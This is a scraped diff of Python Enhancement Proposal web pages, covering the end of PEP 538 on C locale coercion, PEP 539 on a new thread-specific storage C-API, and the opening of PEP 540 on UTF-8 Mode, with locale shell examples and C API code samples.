The current design means that earlier Python versions will instead retain their +default strict error handling on the standard streams, while Python 3.7+ +will consistently use the more permissive surrogateescape handler even +when these locales are explicitly configured (rather than being reached through +locale coercion).

+
+
+

Dropping official support for ASCII based text handling in the legacy C locale

+

We’ve been trying to get strict bytes/text separation to work reliably in the +legacy C locale for over a decade at this point. Not only haven’t we been able +to get it to work, neither has anyone else - the only viable alternatives +identified have been to pass the bytes along verbatim without eagerly decoding +them to text (C/C++, Python 2.x, Ruby, etc), or else to largely ignore the +nominal C/C++ locale encoding and assume the use of either UTF-8 (PEP 540, +Rust, Go, Node.js, etc) or UTF-16-LE (JVM, .NET CLR).

+

While this PEP ensures that developers that genuinely need to do so can still +opt-in to running their Python code in the legacy C locale (by setting +LC_ALL=C, PYTHONCOERCECLOCALE=0, or running a custom build that sets +--without-c-locale-coercion), it also makes it clear that we don’t +expect Python 3’s Unicode handling to be completely reliable in that +configuration, and the recommended alternative is to use a more appropriate +locale setting (potentially in combination with PEP 540’s UTF-8 mode, if that +is available).

+
+
+

Providing implicit locale coercion only when running standalone

+

The major downside of the proposed design in this PEP is that it introduces a +potential discrepancy between the behaviour of the CPython runtime when it is +run as a standalone application and when it is run as an embedded component +inside a larger system (e.g. mod_wsgi running inside Apache httpd).

+

Over the course of Python 3.x development, multiple attempts have been made +to improve the handling of incorrect locale settings at the point where the +Python interpreter is initialised. The problem that emerged is that this is +ultimately too late in the interpreter startup process - data such as command +line arguments and the contents of environment variables may have already been +retrieved from the operating system and processed under the incorrect ASCII +text encoding assumption well before Py_Initialize is called.

+

The problems created by those inconsistencies were then even harder to diagnose +and debug than those created by believing the operating system’s claim that +ASCII was a suitable encoding to use for operating system interfaces. This was +the case even for the default CPython binary, let alone larger C/C++ +applications that embed CPython as a scripting engine.

+

The approach proposed in this PEP handles that problem by moving the locale +coercion as early as possible in the interpreter startup sequence when running +standalone: it takes place directly in the C-level main() function, even +before calling in to the Py_Main() library function that implements the +features of the CPython interpreter CLI.

+

The Py_Initialize API then only gains an explicit warning (emitted on +stderr) when it detects use of the C locale, and relies on the +embedding application to specify something more reasonable.

+

That said, the reference implementation for this PEP adds most of the +functionality to the shared library, with the CLI being updated to +unconditionally call two new private APIs:

+
if (_Py_LegacyLocaleDetected()) {
+    _Py_CoerceLegacyLocale();
+}
+
+
+

These are similar to other “pre-configuration” APIs intended for embedding +applications: they’re designed to be called before Py_Initialize, and +hence change the way the interpreter gets initialized.

+

If these were made public (either as part of this PEP or in a subsequent RFE), +then it would be straightforward for other embedding applications to recreate +the same behaviour as is proposed for the CPython CLI.

+
+
+

Allowing restoration of the legacy behaviour

+

The CPython command line interpreter is often used to investigate faults that +occur in other applications that embed CPython, and those applications may still +be using the C locale even after this PEP is implemented.

+

Providing a simple on/off switch for the locale coercion behaviour makes it +much easier to reproduce the behaviour of such applications for debugging +purposes, as well as making it easier to reproduce the behaviour of older 3.x +runtimes even when running a version with this change applied.

+
+
+

Querying LC_CTYPE for C locale detection

+

LC_CTYPE is the actual locale category that CPython relies on to drive the +implicit decoding of environment variables, command line arguments, and other +text values received from the operating system.

+

As such, it makes sense to check it specifically when attempting to determine +whether or not the current locale configuration is likely to cause Unicode +handling problems.

+
+
+

Explicitly setting LC_CTYPE for UTF-8 locale coercion

+

Python is often used as a glue language, integrating other C/C++ ABI compatible +components in the current process, and components written in arbitrary +languages in subprocesses.

+

Setting LC_CTYPE to C.UTF-8 is important to handle cases where the +problem has arisen from a setting like LC_CTYPE=UTF-8 being provided on a +system where no UTF-8 locale is defined (e.g. when a Mac OS X ssh client is +configured to forward locale settings, and the user logs into a Linux server).

+

This should be sufficient to ensure that when the locale coercion is activated, +the switch to the UTF-8 based locale will be applied consistently across the +current process and any subprocesses that inherit the current environment.
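
+
As an illustration (again assuming a PEP 538 enabled build and a platform that defines the C.UTF-8 locale), a subprocess spawned from a coerced interpreter inherits the updated setting, so locale-aware tools report a UTF-8 character map rather than ASCII:

+
$ LANG=C python3.7 -c "import subprocess; subprocess.run(['locale', 'charmap'])"
+UTF-8
+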

+
+
+

Avoiding setting LANG for UTF-8 locale coercion

+

Earlier versions of this PEP proposed setting the LANG category-independent default locale, in addition to setting LC_CTYPE.

+

This was later removed on the grounds that setting only LC_CTYPE is +sufficient to handle all of the problematic scenarios that the PEP aimed +to resolve, while setting LANG as well would break cases where LANG +was set correctly, and the locale problems were solely due to an incorrect +LC_CTYPE setting ([22]).

+

For example, consider a Python application that called the Linux date +utility in a subprocess rather than doing its own date formatting:

+
$ LANG=ja_JP.UTF-8 LC_CTYPE=C date
+2017年  5月 23日 火曜日 17:31:03 JST
+
+$ LANG=ja_JP.UTF-8 LC_CTYPE=C.UTF-8 date  # Coercing only LC_CTYPE
+2017年  5月 23日 火曜日 17:32:58 JST
+
+$ LANG=C.UTF-8 LC_CTYPE=C.UTF-8 date  # Coercing both of LC_CTYPE and LANG
+Tue May 23 17:31:10 JST 2017
+
+
+

With only LC_CTYPE updated in the Python process, the subprocess would +continue to behave as expected. However, if LANG was updated as well, +that would effectively override the LC_TIME setting and use the wrong +date formatting conventions.

+
+
+

Avoiding setting LC_ALL for UTF-8 locale coercion

+

Earlier versions of this PEP proposed setting the LC_ALL locale override, +in addition to setting LC_CTYPE.

+

This was changed after it was determined that just setting LC_CTYPE and +LANG should be sufficient to handle all the scenarios the PEP aims to +cover, as it avoids causing any problems in cases like the following:

+
$ LANG=C LC_MONETARY=ja_JP.utf8 ./python -c \
+  "from locale import setlocale, LC_ALL, currency; setlocale(LC_ALL, ''); print(currency(1e6))"
+¥1000000
+
+
+
+
+

Skipping locale coercion if LC_ALL is set in the current environment

+

With locale coercion now only setting LC_CTYPE and LANG, it will have +no effect if LC_ALL is also set. To avoid emitting a spurious locale +coercion notice in that case, coercion is instead skipped entirely.
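
+
A quick way to see why coercion would be futile in that situation is to note that the platform itself gives LC_ALL precedence over LC_CTYPE (a sketch using the POSIX locale utility):

+
$ LC_ALL=C LC_CTYPE=C.UTF-8 locale | grep LC_CTYPE
+LC_CTYPE="C"
+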

+
+
+

Considering locale coercion independently of “UTF-8 mode”

+

With both this PEP’s locale coercion and PEP 540’s UTF-8 mode under +consideration for Python 3.7, it makes sense to ask whether or not we can +limit ourselves to only doing one or the other, rather than making both +changes.

+

The UTF-8 mode proposed in PEP 540 has two major limitations that make it a +potential complement to this PEP rather than a potential replacement.

+

First, unlike this PEP, PEP 540’s UTF-8 mode makes it possible to change default +behaviours that are not currently configurable at all. While that’s exactly +what makes the proposal interesting, it’s also what makes it an entirely +unproven approach. By contrast, the approach proposed in this PEP builds +directly atop existing configuration settings for the C locale system ( +LC_CTYPE, LANG) and Python’s standard streams (PYTHONIOENCODING) +that have already been in use for years to handle the kinds of compatibility +problems discussed in this PEP.

+

Secondly, one of the things we know based on that experience is that the +proposed locale coercion can resolve problems not only in CPython itself, +but also in extension modules that interact with the standard streams, like +GNU readline. As an example, consider the following interactive session +from a PEP 538 enabled CPython build, where each line after the first is +executed by doing “up-arrow, left-arrow x4, delete, enter”:

+
$ LANG=C ./python
+Python 3.7.0a0 (heads/pep538-coerce-c-locale:188e780, May  7 2017, 00:21:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌἤ")
+ℙƴ☂ℌἤ
+>>> print("ℙƴ☂ἤ")
+ℙƴ☂ἤ
+>>> print("ℙƴἤ")
+ℙƴἤ
+>>> print("ℙἤ")
+ℙἤ
+>>> print("ἤ")
+ἤ
+>>>
+
+
+

This is exactly what we’d expect from a well-behaved command history editor.

+

By contrast, the following is what currently happens on an older release if +you only change the Python level stream encoding settings without updating the +locale settings:

+
$ LANG=C PYTHONIOENCODING=utf-8:surrogateescape python3
+Python 3.5.3 (default, Apr 24 2017, 13:32:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌ�")
+ File "<stdin>", line 0
+
+   ^
+SyntaxError: 'utf-8' codec can't decode bytes in position 20-21:
+invalid continuation byte
+
+
+

That particular misbehaviour is coming from GNU readline, not CPython - +because the command history editing wasn’t UTF-8 aware, it corrupted the history +buffer and fed such nonsense to stdin that even the surrogateescape error +handler was bypassed. While PEP 540’s UTF-8 mode could technically be updated +to also reconfigure readline, that’s just one extension module that might +be interacting with the standard streams without going through the CPython +C API, and any change made by CPython would only apply when readline is running +directly as part of Python 3.7 rather than in a separate subprocess.

+

However, if we actually change the configured locale, GNU readline starts +behaving itself, without requiring any changes to the embedding application:

+
$ LANG=C.UTF-8 python3
+Python 3.5.3 (default, Apr 24 2017, 13:32:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌἤ")
+ℙƴ☂ℌἤ
+>>> print("ℙƴ☂ἤ")
+ℙƴ☂ἤ
+>>> print("ℙƴἤ")
+ℙƴἤ
+>>> print("ℙἤ")
+ℙἤ
+>>> print("ἤ")
+ἤ
+>>>
+$ LC_CTYPE=C.UTF-8 python3
+Python 3.5.3 (default, Apr 24 2017, 13:32:13)
+[GCC 6.3.1 20161221 (Red Hat 6.3.1-1)] on linux
+Type "help", "copyright", "credits" or "license" for more information.
+>>> print("ℙƴ☂ℌøἤ")
+ℙƴ☂ℌøἤ
+>>> print("ℙƴ☂ℌἤ")
+ℙƴ☂ℌἤ
+>>> print("ℙƴ☂ἤ")
+ℙƴ☂ἤ
+>>> print("ℙƴἤ")
+ℙƴἤ
+>>> print("ℙἤ")
+ℙἤ
+>>> print("ἤ")
+ἤ
+>>>
+
+
+
+
+

Enabling C locale coercion and warnings on Mac OS X, iOS and Android

+

On Mac OS X, iOS, and Android, CPython already assumes the use of UTF-8 for +system interfaces, and we expect most other locale-aware components to do the +same.

+

Accordingly, this PEP originally proposed to disable locale coercion and +warnings at build time for these platforms, on the assumption that it would +be entirely redundant.

+

However, that assumption turned out to be incorrect, as subsequent +investigations showed that if you explicitly configure LANG=C on +these platforms, extension modules like GNU readline will misbehave in much the +same way as they do on other *nix systems. [21]

+

In addition, Mac OS X is also frequently used as a development and testing +platform for Python software intended for deployment to other *nix environments +(such as Linux or Android), and Linux is similarly often used as a development +and testing platform for mobile and Mac OS X applications.

+

Accordingly, this PEP enables the locale coercion and warning features by +default on all platforms that use CPython’s autotools based build toolchain +(i.e. everywhere other than Windows).

+
+
+
+

Implementation

+

The reference implementation is being developed in the +pep538-coerce-c-locale feature branch [18] in Alyssa Coghlan’s fork of the +CPython repository on GitHub. A work-in-progress PR is available at [20].

+

This reference implementation covers not only the enhancement request in +issue 28180 [1], but also the Android compatibility fixes needed to resolve +issue 28997 [16].

+
+
+

Backporting to earlier Python 3 releases

+
+

Backporting to Python 3.6.x

+

If this PEP is accepted for Python 3.7, redistributors backporting the change +specifically to their initial Python 3.6.x release will be both allowed and +encouraged. However, such backports should only be undertaken either in +conjunction with the changes needed to also provide a suitable locale by +default, or else specifically for platforms where such a locale is already +consistently available.

+

At least the Fedora project is planning to pursue this approach for the +upcoming Fedora 26 release [19].

+
+
+

Backporting to other 3.x releases

+

While the proposed behavioural change is seen primarily as a bug fix addressing +Python 3’s current misbehaviour in the default ASCII-based C locale, it still +represents a reasonably significant change in the way CPython interacts with +the C locale system. As such, while some redistributors may still choose to +backport it to even earlier Python 3.x releases based on the needs and +interests of their particular user base, this wouldn’t be encouraged as a +general practice.

+

However, configuring Python 3 environments (such as base container +images) to use these configuration settings by default is both allowed +and recommended.

+
+
+
+

Acknowledgements

+

The locale coercion approach proposed in this PEP is inspired directly by +Armin Ronacher’s handling of this problem in the click command line +utility development framework [2]:

+
$ LANG=C python3 -c 'import click; cli = click.command()(lambda:None); cli()'
+Traceback (most recent call last):
+  ...
+RuntimeError: Click will abort further execution because Python 3 was
+configured to use ASCII as encoding for the environment.  Either run this
+under Python 2 or consult http://click.pocoo.org/python3/ for mitigation
+steps.
+
+This system supports the C.UTF-8 locale which is recommended.
+You might be able to resolve your issue by exporting the
+following environment variables:
+
+    export LC_ALL=C.UTF-8
+    export LANG=C.UTF-8
+
+
+

The change was originally proposed as a downstream patch for Fedora’s +system Python 3.6 package [3], and then reformulated as a PEP for Python 3.7 +with a section allowing for backports to earlier versions by redistributors. +In parallel with the development of the upstream patch, Charalampos Stratakis +has been working on the Fedora 26 backport and providing feedback on the +practical viability of the proposed changes.

+

The initial draft was posted to the Python Linux SIG for discussion [10] and +then amended based on both that discussion and Victor Stinner’s work in +PEP 540 [11].

+

The “ℙƴ☂ℌøἤ” string used in the Unicode handling examples throughout this PEP +is taken from Ned Batchelder’s excellent “Pragmatic Unicode” presentation [9].

+

Stephen Turnbull has long provided valuable insight into the text encoding +handling challenges he regularly encounters at the University of Tsukuba +(筑波大学).

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0538.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0539/index.html b/pep-0539/index.html new file mode 100644 index 00000000000..346341ef895 --- /dev/null +++ b/pep-0539/index.html @@ -0,0 +1,567 @@ + + + + + + + + PEP 539 – A New C-API for Thread-Local Storage in CPython | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 539 – A New C-API for Thread-Local Storage in CPython

+
+
Author:
+
Erik M. Bray, Masayuki Yamamoto
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Dec-2016
+
Python-Version:
+
3.7
+
Post-History:
+
16-Dec-2016, 31-Aug-2017, 08-Sep-2017
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The proposal is to add a new Thread Local Storage (TLS) API to CPython which +would supersede use of the existing TLS API within the CPython interpreter, +while deprecating the existing API. The new API is named the “Thread +Specific Storage (TSS) API” (see Rationale for Proposed Solution for the +origin of the name).

+

Because the existing TLS API is only used internally (it is not mentioned in +the documentation, and the header that defines it, pythread.h, is not +included in Python.h either directly or indirectly), this proposal +probably only affects CPython, but might also affect other interpreter +implementations (PyPy?) that implement parts of the CPython API.

+

This is motivated primarily by the fact that the old API uses int to +represent TLS keys across all platforms, which is neither POSIX-compliant, +nor portable in any practical sense [1].

+
+

Note

+

Throughout this document the acronym “TLS” refers to Thread Local Storage and should not be confused with the “Transport Layer Security” protocols.

+
+
+
+

Specification

+

The current API for TLS used inside the CPython interpreter consists of 6 +functions:

+
PyAPI_FUNC(int) PyThread_create_key(void)
+PyAPI_FUNC(void) PyThread_delete_key(int key)
+PyAPI_FUNC(int) PyThread_set_key_value(int key, void *value)
+PyAPI_FUNC(void *) PyThread_get_key_value(int key)
+PyAPI_FUNC(void) PyThread_delete_key_value(int key)
+PyAPI_FUNC(void) PyThread_ReInitTLS(void)
+
+
+

These would be superseded by a new set of analogous functions:

+
PyAPI_FUNC(int) PyThread_tss_create(Py_tss_t *key)
+PyAPI_FUNC(void) PyThread_tss_delete(Py_tss_t *key)
+PyAPI_FUNC(int) PyThread_tss_set(Py_tss_t *key, void *value)
+PyAPI_FUNC(void *) PyThread_tss_get(Py_tss_t *key)
+
+
+

The specification also adds a few new features:

+
    +
  • A new type Py_tss_t–an opaque type the definition of which may +depend on the underlying TLS implementation. It is defined:
    typedef struct {
    +    int _is_initialized;
    +    NATIVE_TSS_KEY_T _key;
    +} Py_tss_t;
    +
    +
    +

    where NATIVE_TSS_KEY_T is a macro whose value depends on the +underlying native TLS implementation (e.g. pthread_key_t).

    +
  • +
  • An initializer for Py_tss_t variables, Py_tss_NEEDS_INIT.
  • +
  • Three new functions:
    PyAPI_FUNC(Py_tss_t *) PyThread_tss_alloc(void)
    +PyAPI_FUNC(void) PyThread_tss_free(Py_tss_t *key)
    +PyAPI_FUNC(int) PyThread_tss_is_created(Py_tss_t *key)
    +
    +
    +

    The first two are needed for dynamic (de-)allocation of a Py_tss_t, +particularly in extension modules built with Py_LIMITED_API, where +static allocation of this type is not possible due to its implementation +being opaque at build time. A value returned by PyThread_tss_alloc is +in the same state as a value initialized with Py_tss_NEEDS_INIT, or +NULL in the case of dynamic allocation failure. The behavior of +PyThread_tss_free involves calling PyThread_tss_delete +preventively, or is a no-op if the value pointed to by the key +argument is NULL. PyThread_tss_is_created returns non-zero if the +given Py_tss_t has been initialized (i.e. by PyThread_tss_create).

    +
  • +
+

The new TSS API does not provide functions which correspond to PyThread_delete_key_value and PyThread_ReInitTLS, because these functions were needed only for CPython’s now defunct built-in TLS implementation; that is, the existing behavior of these functions is treated as follows: PyThread_delete_key_value(key) is equivalent to PyThread_set_key_value(key, NULL), and PyThread_ReInitTLS() is a no-op [8].

+

The new PyThread_tss_ functions are almost exactly analogous to their +original counterparts with a few minor differences: Whereas +PyThread_create_key takes no arguments and returns a TLS key as an +int, PyThread_tss_create takes a Py_tss_t* as an argument and +returns an int status code. The behavior of PyThread_tss_create is +undefined if the value pointed to by the key argument is not initialized +by Py_tss_NEEDS_INIT. The returned status code is zero on success +and non-zero on failure. The meanings of non-zero status codes are not +otherwise defined by this specification.

+

Similarly the other PyThread_tss_ functions are passed a Py_tss_t* +whereas previously the key was passed by value. This change is necessary, as +being an opaque type, the Py_tss_t type could hypothetically be almost +any size. This is especially necessary for extension modules built with +Py_LIMITED_API, where the size of the type is not known. Except for +PyThread_tss_free, the behaviors of PyThread_tss_ are undefined if the +value pointed to by the key argument is NULL.

+

Moreover, because of the use of Py_tss_t instead of int, there are +behaviors in the new API which differ from the existing API with regard to +key creation and deletion. PyThread_tss_create can be called repeatedly +on the same key–calling it on an already initialized key is a no-op and +immediately returns success. Similarly for calling PyThread_tss_delete +with an uninitialized key.

+

The behavior of PyThread_tss_delete is defined to change the key’s +initialization state to “uninitialized”–this allows, for example, +statically allocated keys to be reset to a sensible state when restarting +the CPython interpreter without terminating the process (e.g. embedding +Python in an application) [12].

+

The old PyThread_*_key* functions will be marked as deprecated in the +documentation, but will not generate runtime deprecation warnings.

+

Additionally, on platforms where sizeof(pthread_key_t) != sizeof(int), +PyThread_create_key will return immediately with a failure status, and +the other TLS functions will all be no-ops on such platforms.

+
+

Comparison of API Specification

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
API                  | Thread Local Storage (TLS)            | Thread Specific Storage (TSS)
Version              | Existing                              | New
Key Type             | int                                   | Py_tss_t (opaque type)
Handle Native Key    | cast to int                           | conceal into internal field
Function Argument    | int                                   | Py_tss_t *
Features             | • create key                          | • create key
                     | • delete key                          | • delete key
                     | • set value                           | • set value
                     | • get value                           | • get value
                     | • delete value                        | • (set NULL instead) [8]
                     | • reinitialize keys (after fork)      | • (unnecessary) [8]
                     |                                       | • dynamically (de-)allocate key
                     |                                       | • check key’s initialization state
Key Initializer      | (-1 as key creation failure)          | Py_tss_NEEDS_INIT
Requirement          | native threads                        | native threads
                     | (since CPython 3.7 [9])               |
Restriction          | No support for platforms where        | Unable to statically allocate
                     | native TLS key is defined in a way    | keys when Py_LIMITED_API
                     | that cannot be safely cast to int.    | is defined.
+
+
+

Example

+

With the proposed changes, a TSS key is initialized like:

+
static Py_tss_t tss_key = Py_tss_NEEDS_INIT;
+if (PyThread_tss_create(&tss_key)) {
+    /* ... handle key creation failure ... */
+}
+
+
+

The initialization state of the key can then be checked like:

+
assert(PyThread_tss_is_created(&tss_key));
+
+
+

The rest of the API is used analogously to the old API:

+
int the_value = 1;
+if (PyThread_tss_get(&tss_key) == NULL) {
+    PyThread_tss_set(&tss_key, (void *)&the_value);
+    assert(PyThread_tss_get(&tss_key) != NULL);
+}
+/* ... once done with the key ... */
+PyThread_tss_delete(&tss_key);
+assert(!PyThread_tss_is_created(&tss_key));
+
+
+

When Py_LIMITED_API is defined, a TSS key must be dynamically allocated:

+
static Py_tss_t *ptr_key = PyThread_tss_alloc();
+if (ptr_key == NULL) {
+    /* ... handle key allocation failure ... */
+}
+assert(!PyThread_tss_is_created(ptr_key));
+/* ... once done with the key ... */
+PyThread_tss_free(ptr_key);
+ptr_key = NULL;
+
+
+
+
+
+

Platform Support Changes

+

A new “Native Thread Implementation” section will be added to PEP 11 that +states:

+
    +
  • As of CPython 3.7, all platforms are required to provide a native thread +implementation (such as pthreads or Windows) to implement the TSS +API. Any TSS API problems that occur in an implementation without native +threads will be closed as “won’t fix”.
  • +
+
+
+

Motivation

+

The primary problem at issue here is the type of the keys (int) used for +TLS values, as defined by the original PyThread TLS API.

+

The original TLS API was added to Python by GvR back in 1997, and at the time the key used to represent a TLS value was an int, and so it has remained to the time of writing. This used CPython’s own TLS implementation which long remained unused, largely unchanged, in Python/thread.c. Support for implementation of the API on top of native thread implementations (pthreads and Windows) was added much later, and the built-in implementation has been deemed no longer necessary and has since been removed [9].

+

The problem with the choice of int to represent a TLS key, is that while +it was fine for CPython’s own TLS implementation, and happens to be +compatible with Windows (which uses DWORD for the analogous data), it is +not compatible with the POSIX standard for the pthreads API, which defines +pthread_key_t as an opaque type not further defined by the standard (as +with Py_tss_t described above) [14]. This leaves it up to the underlying +implementation how a pthread_key_t value is used to look up +thread-specific data.

+

This has not generally been a problem for Python’s API, as it just happens +that on Linux pthread_key_t is defined as an unsigned int, and so is +fully compatible with Python’s TLS API–pthread_key_t’s created by +pthread_create_key can be freely cast to int and back (well, not +exactly, even this has some limitations as pointed out by issue #22206).

+

However, as issue #25658 points out, there are at least some platforms +(namely Cygwin, CloudABI, but likely others as well) which have otherwise +modern and POSIX-compliant pthreads implementations, but are not compatible +with Python’s API because their pthread_key_t is defined in a way that +cannot be safely cast to int. In fact, the possibility of running into +this problem was raised by MvL at the time pthreads TLS was added [2].

+

It could be argued that PEP 11 makes specific requirements for supporting a new, not otherwise officially-supported platform (such as CloudABI), and that the status of Cygwin support is currently dubious. However, this creates a very high barrier to supporting platforms that are otherwise Linux- and/or POSIX-compatible and where CPython might otherwise “just work” except for this one hurdle. CPython itself imposes this implementation barrier by way of an API that is not compatible with POSIX (and in fact makes invalid assumptions about pthreads).

+
+
+

Rationale for Proposed Solution

+

The use of an opaque type (Py_tss_t) to key TLS values allows the API to +be compatible with all present (POSIX and Windows) and future (C11?) native +TLS implementations supported by CPython, as it allows the definition of +Py_tss_t to depend on the underlying implementation.

+

Since the existing TLS API has been available in the limited API [13] for some platforms (e.g. Linux), CPython makes an effort to likewise provide the new TSS API at that level. Note, however, that the Py_tss_t definition becomes an opaque struct when Py_LIMITED_API is defined, because exposing NATIVE_TSS_KEY_T as part of the limited API would prevent us from switching native thread implementation without rebuilding extension modules.

+

A new API must be introduced, rather than changing the function signatures of +the current API, in order to maintain backwards compatibility. The new API +also more clearly groups together these related functions under a single name +prefix, PyThread_tss_. The “tss” in the name stands for “thread-specific +storage”, and was influenced by the naming and design of the “tss” API that is +part of the C11 threads API [15]. However, this is in no way meant to imply +compatibility with or support for the C11 threads API, or signal any future +intention of supporting C11–it’s just the influence for the naming and design.

+

The inclusion of the special initializer Py_tss_NEEDS_INIT is required by the fact that not all native TLS implementations define a sentinel value for uninitialized TLS keys. For example, on Windows a TLS key is represented by a DWORD (unsigned int) and its value must be treated as opaque [3]. So there is no unsigned integer value that can be safely used to represent an uninitialized TLS key on Windows. Likewise, POSIX does not specify a sentinel for an uninitialized pthread_key_t, instead relying on the pthread_once interface to ensure that a given TLS key is initialized only once per-process. Therefore, the Py_tss_t type contains an explicit ._is_initialized field that can indicate the key’s initialization state independent of the underlying implementation.

+

Changing PyThread_create_key to immediately return a failure status on +systems using pthreads where sizeof(int) != sizeof(pthread_key_t) is +intended as a sanity check: Currently, PyThread_create_key may report +initial success on such systems, but attempts to use the returned key are +likely to fail. Although in practice this failure occurs earlier in the +interpreter initialization, it’s better to fail immediately at the source of +problem (PyThread_create_key) rather than sometime later when use of an +invalid key is attempted. In other words, this indicates clearly that the +old API is not supported on platforms where it cannot be used reliably, and +that no effort will be made to add such support.

+
+
+

Rejected Ideas

+
    +
• Do nothing: The status quo is fine because it works on Linux, and platforms wishing to be supported by CPython should follow the requirements of PEP 11. As explained above, while this would be a fair argument if CPython were being asked to make changes to support particular quirks or features of a specific platform, in this case it is a quirk of CPython that prevents it from being used to its full potential on otherwise POSIX-compliant platforms. The fact that the current implementation happens to work on Linux is a happy accident, and there’s no guarantee that this will never change.
  • +
  • Affected platforms should just configure Python --without-threads: +this is no longer an option as the --without-threads option has +been removed for Python 3.7 [16].
  • +
  • Affected platforms should use CPython’s built-in TLS implementation +instead of a native TLS implementation: This is a more acceptable +alternative to the previous idea, and in fact there had been a patch to do +just that [4]. However, the built-in implementation being “slower and +clunkier” in general than native implementations still needlessly hobbles +performance on affected platforms. At least one other module +(tracemalloc) is also broken if Python is built without a native TLS +implementation. This idea also cannot be adopted because the built-in +implementation has since been removed.
  • +
  • Keep the existing API, but work around the issue by providing a mapping from +pthread_key_t values to int values. A couple attempts were made at +this ([5], [6]), but this injects needless complexity and overhead +into performance-critical code on platforms that are not currently affected +by this issue (such as Linux). Even if use of this workaround were made +conditional on platform compatibility, it introduces platform-specific code +to maintain, and still has the problem of the previous rejected ideas of +needlessly hobbling performance on affected platforms.
  • +
+
+
+

Implementation

+

An initial version of a patch [7] is available on the bug tracker for this +issue. Since the migration to GitHub, its development has continued in the +pep539-tss-api feature branch [10] in Masayuki Yamamoto’s fork of the +CPython repository on GitHub. A work-in-progress PR is available at [11].

+

This reference implementation covers not only the new API implementation +features, but also the client code updates needed to replace the existing +TLS API with the new TSS API.

+
+ +
+

References and Footnotes

+ +
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0539.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0540/index.html b/pep-0540/index.html new file mode 100644 index 00000000000..3dee9f07a41 --- /dev/null +++ b/pep-0540/index.html @@ -0,0 +1,499 @@ + + + + + + + + PEP 540 – Add a new UTF-8 Mode | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 540 – Add a new UTF-8 Mode

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
BDFL-Delegate:
+
INADA Naoki
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Jan-2016
+
Python-Version:
+
3.7
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new “UTF-8 Mode” to enhance Python’s use of UTF-8. When UTF-8 Mode +is active, Python will:

+
    +
  • use the utf-8 encoding, regardless of the locale currently set by +the current platform, and
  • +
  • change the stdin and stdout error handlers to +surrogateescape.
  • +
+

This mode is off by default, but is automatically activated when using +the “POSIX” locale.

+

Add the -X utf8 command line option and PYTHONUTF8 environment +variable to control UTF-8 Mode.

+
+
+

Rationale

+
+

Locale encoding and UTF-8

+

Python 3.6 uses the locale encoding for filenames, environment +variables, standard streams, etc. The locale encoding is inherited from +the locale; the encoding and the locale are tightly coupled.

+

Many users inherit the ASCII encoding from the POSIX locale, aka the “C” locale, but are unable to change the locale for various reasons. This encoding is very limited in terms of Unicode support: any non-ASCII character is likely to cause trouble.

+

It isn’t always easy to get an accurate locale. Locales don’t get the exact same name on different Linux distributions, FreeBSD, macOS, etc. And some locales, like the recent C.UTF-8 locale, are only supported by a few platforms. The current locale can even vary on the same platform depending on context; for example, an SSH connection can use a different encoding than the filesystem or local terminal encoding on the same machine.

+

On the flip side, Python 3.6 is already using UTF-8 by default on macOS, +Android and Windows (PEP 529) for most functions – although +open() is a notable exception here. UTF-8 is also the default +encoding of Python scripts, XML and JSON file formats. The Go +programming language +uses UTF-8 for all strings.

+

UTF-8 support is nearly ubiquitous for data read and written by modern +platforms. It also has excellent support in Python. The problem is +simply that the locale is frequently misconfigured. An obvious solution +suggests itself: ignore the locale encoding and use UTF-8.

+
+
+

Passthrough for undecodable bytes: surrogateescape

+

When decoding bytes from UTF-8 using the default strict error +handler, Python 3 raises a UnicodeDecodeError on the first +undecodable byte.

+

Unix command line tools like cat or grep and most Python 2 +applications simply do not have this class of bugs: they don’t decode +data, but process data as a raw bytes sequence.

+

Python 3 already has a solution to behave like Unix tools and Python 2: +the surrogateescape error handler (PEP 383). It allows processing +data as if it were bytes, but uses Unicode in practice; undecodable +bytes are stored as surrogate characters.
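
+
A short round-trip illustrates the mechanism: an undecodable byte is smuggled through decoding as a lone surrogate and restored unchanged on encoding (the sample byte here is illustrative):

+
$ python3 -c 'data = b"caf\xe9"; text = data.decode("utf-8", "surrogateescape"); print(repr(text)); print(text.encode("utf-8", "surrogateescape") == data)'
+'caf\udce9'
+True
+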

+

UTF-8 Mode sets the surrogateescape error handler for stdin and stdout, since these streams are commonly associated with Unix command line tools.

+

However, users have a different expectation on files. Files are expected +to be properly encoded, and Python is expected to fail early when +open() is called with the wrong options, like opening a JPEG picture +in text mode. The open() default error handler remains strict +for these reasons.

+
+
+

No change by default for best backward compatibility

+

While UTF-8 is perfect in most cases, sometimes the locale encoding is +actually the best encoding.

+

